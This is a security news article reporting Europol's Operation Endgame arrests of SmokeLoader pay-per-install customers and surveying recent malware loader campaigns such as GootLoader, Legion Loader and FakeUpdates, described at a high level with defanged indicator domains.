Law enforcement authorities have announced that they tracked down the customers of the SmokeLoader malware and detained at least five individuals.
“In a coordinated series of actions, customers of the Smokeloader pay-per-install botnet, operated by the actor known as ‘Superstar,’ faced consequences such as arrests, house searches, arrest warrants or ‘knock and talks,'” Europol said in a statement.
Superstar is alleged to have run a pay-per-install service that enabled its customers to gain unauthorized access to victim machines, using the loader as a conduit to deploy next-stage payloads of their choice.
According to the European law enforcement agency, the access afforded by the botnet was used for various purposes such as keylogging, webcam access, ransomware deployment, and cryptocurrency mining.
The latest action, part of an ongoing coordinated exercise called Operation Endgame, which led to the dismantling of online infrastructure associated with multiple malware loader operations like IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot last year.
Canada, the Czech Republic, Denmark, France, Germany, the Netherlands, and the United States participated in the follow-up effort that’s meant to focus on the “demand side” of the cybercrime ecosystem.
Authorities, per Europol, tracked down the customers who were registered in a database that was previously seized, linking their online personas to real-life individuals and calling them for questioning. An unspecified number of suspects are believed to have opted to cooperate and have their personal devices examined to collect digital evidence.
“Several suspects resold the services purchased from SmokeLoader at a markup, thus adding an additional layer of interest to the investigation,” Europol said. “Some of the suspects had assumed they were no longer on law enforcement’s radar, only to come to the harsh realisation that they were still being targeted.”
Malware Loaders Come in Different Forms
The development comes as Broadcom-owned Symantec revealed details of a phishing campaign that employs the Windows screensaver (SCR) file format to distribute a Delphi-based malware loader named ModiLoader (aka DBatLoader and NatsoLoader) on victims’ machines.
It also coincides with an evasive web campaign that tricks users into running malicious Windows installer (MSI) files to deploy another loader malware referred to as Legion Loader.
“This campaign uses a method called ‘pastejacking’ or ‘clipboard hijacking’ because viewers are instructed to paste content into a Run window,” Palo Alto Networks Unit 42 said, adding it leverages several cloaking strategies to evade detection through CAPTCHA pages and disguising malware download pages as blog sites.
Phishing campaigns have also been a delivery vehicle for Koi Loader, which is then used to download and execute an information stealer called Koi Stealer as part of a multi-stage infection sequence.
“The utilization of Anti-VM capabilities by malware like Koi Loader and Koi Stealer highlights the capability of modern threats to evade analysis and detection by analysts, researchers, and sandboxes,” eSentire said in a report published last month.
And that’s not all. Recent months have once again witnessed the return of GootLoader (aka SLOWPOUR), which is being spread via sponsored search results on Google, a technique first spotted in early November 2024.
The attack targets users searching for “non disclosure agreement template” on Google to serve bogus ads that, when clicked, are redirected to a site (“lawliner[.]com”) where they are asked to enter their email addresses to receive the document.
“Shortly after they enter their email, they will receive an email from lawyer@skhm[.]org, with a link to their requested Word document (DOCX),” according to a security researcher who goes by the name GootLoader and has closely monitored the malware loader for several years.
“If the user passed all of their gates, they will download a zipped JavaScript file. When the user unzips and executes the JavaScript file, the same GootLoader behavior occurs.”
Also spotted is a JavaScript downloader known as FakeUpdates (aka SocGholish) that’s typically propagated via social engineering ploys that deceive users into installing the malware by disguising as a legitimate update for web browsers like Google Chrome.
“Attackers distribute malware using compromised resources, injecting malicious JavaScript into vulnerable sites to fingerprint hosts, perform eligibility checks, and display fake update pages,” Google said. “The malware is commonly delivered via drive-by downloads. The malicious JavaScript acts as a downloader, delivering additional malware.”
The fake browser update attack pathway has also been observed distributing two other JavaScript malware families called FAKESMUGGLES, which is so named for the use of HTML smuggling to deliver next-stage payloads such as NetSupport Manager, and FAKETREFF, which communicates with a remote server to retrieve additional payloads like DarkGate and send basic host information.
